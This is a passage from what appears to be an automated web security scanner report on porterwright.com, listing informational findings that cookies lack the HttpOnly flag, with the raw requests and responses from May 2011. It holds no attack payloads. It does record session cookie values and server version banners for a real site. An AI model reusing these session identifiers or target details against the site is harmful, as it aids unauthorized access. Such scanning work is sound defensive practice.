X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1161; path=/
Set-Cookie: PortletId=51101; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 36498
Content-Length: 36498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>


       <t
...[SNIP]...
18.165. http://www.porterwright.com/emailthispage/emdisclaimer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /emailthispage/emdisclaimer.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /emailthispage/emdisclaimer.aspx HTTP/1.1
Host: www.porterwright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; NavId=0; ZoneId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=221978393.1924349939.1305202915.1305216543.1305218573.3; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=221978393; __utmb=221978393.3.10.1305218573; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; SiteId=1111;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:58:28 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1159; path=/
Set-Cookie: PortletId=49001; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5285


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
   <title></titl
...[SNIP]...
18.166. http://www.porterwright.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.porterwright.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=221978393.1924349939.1305202915.1305202915.1305216543.2; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1160; PortletId=50001; SiteId=1111; SERVER_PORT=80; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; ZoneId=7; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utmb=221978393.1.10.1305216543; __utmc=221978393

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:09:57 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=0; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 462
Content-Length: 462


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...
18.167. http://www.porterwright.com/government--regulatory-affairs-practice-areas/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /government--regulatory-affairs-practice-areas/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /government--regulatory-affairs-practice-areas/ HTTP/1.1
Host: www.porterwright.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.porterwright.com/services/
Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=221978393.1924349939.1305202915.1305216543.1305218573.3; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1111; SERVER_PORT=80; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; ZoneId=0; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utmc=221978393; __utmb=221978393.2.10.1305218573

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:44:21 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1145; path=/
Set-Cookie: PortletId=35001; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 35607
Content-Length: 35607


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>


       <t
...[SNIP]...
18.168. http://www.porterwright.com/news/xpqNewsDetail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /news/xpqNewsDetail.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/xpqNewsDetail.aspx HTTP/1.1
Host: www.porterwright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; NavId=0; ZoneId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=221978393.1924349939.1305202915.1305216543.1305218573.3; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=221978393; __utmb=221978393.3.10.1305218573; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; SiteId=1111;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:57:56 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1150; path=/
Set-Cookie: PortletId=40001; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3651


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
   <title></titl
...[SNIP]...
18.169. http://www.porterwright.com/people/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /people/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /people/ HTTP/1.1
Host: www.porterwright.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.porterwright.com/careers/
Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=221978393.1924349939.1305202915.1305216543.1305218573.3; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1111; SERVER_PORT=80; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; ZoneId=0; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utmc=221978393

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:51:24 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1144; path=/
Set-Cookie: PortletId=34001; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 110264
Content-Length: 110264


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>


       <t
...[SNIP]...
18.170. http://www.porterwright.com/professionals/xpqProfResults.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /professionals/xpqProfResults.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /professionals/xpqProfResults.aspx?xpST=ProfessionalResults&LastName=J HTTP/1.1
Host: www.porterwright.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.porterwright.com/people/
Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=221978393.1924349939.1305202915.1305218573.1305222687.4; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1111; SERVER_PORT=80; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; ZoneId=0; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utmc=221978393; __utmb=221978393.1.10.1305222687

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:51:34 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1144; path=/
Set-Cookie: PortletId=34001; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 51711
Content-Length: 51711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>


       <t
...[SNIP]...
18.171. http://www.porterwright.com/search/xpqSiteSearch.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /search/xpqSiteSearch.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/xpqSiteSearch.aspx HTTP/1.1
Host: www.porterwright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; NavId=0; ZoneId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=221978393.1924349939.1305202915.1305216543.1305218573.3; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=221978393; __utmb=221978393.3.10.1305218573; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; SiteId=1111;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:58:15 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1154; path=/
Set-Cookie: PortletId=44001; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7538


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
   <title></titl
...[SNIP]...
18.172. http://www.porterwright.com/services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /services/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/ HTTP/1.1
Host: www.porterwright.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.porterwright.com/contactus/
Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=221978393.1924349939.1305202915.1305216543.1305218573.3; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1111; SERVER_PORT=80; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; ZoneId=0; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utmc=221978393; __utmb=221978393.1.10.1305218573

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:43:00 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1145; path=/
Set-Cookie: PortletId=35001; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 93594
Content-Length: 93594


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>


       <t
...[SNIP]...
18.173. http://www.porterwright.com/services/xpqServiceDetail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /services/xpqServiceDetail.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/xpqServiceDetail.aspx HTTP/1.1
Host: www.porterwright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; NavId=0; ZoneId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=221978393.1924349939.1305202915.1305216543.1305218573.3; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=221978393; __utmb=221978393.3.10.1305218573; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; SiteId=1111;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:58:26 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1145; path=/
Set-Cookie: PortletId=35001; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4071


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
   <title></titl
...[SNIP]...
18.174. http://www.porterwright.com/services/xpqServiceListPW.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /services/xpqServiceListPW.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/xpqServiceListPW.aspx HTTP/1.1
Host: www.porterwright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; NavId=0; ZoneId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=221978393.1924349939.1305202915.1305216543.1305218573.3; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=221978393; __utmb=221978393.3.10.1305218573; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; SiteId=1111;

Response

HTTP/1.1 302 Found
Connection: close
Date: Thu, 12 May 2011 16:58:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Error.html?aspxerrorpath=/FCWSite/Features/_xpress/xpqServiceListPW.aspx
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1145; path=/
Set-Cookie: PortletId=35001; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 204

<html><head><title>Object moved</title></head><body>
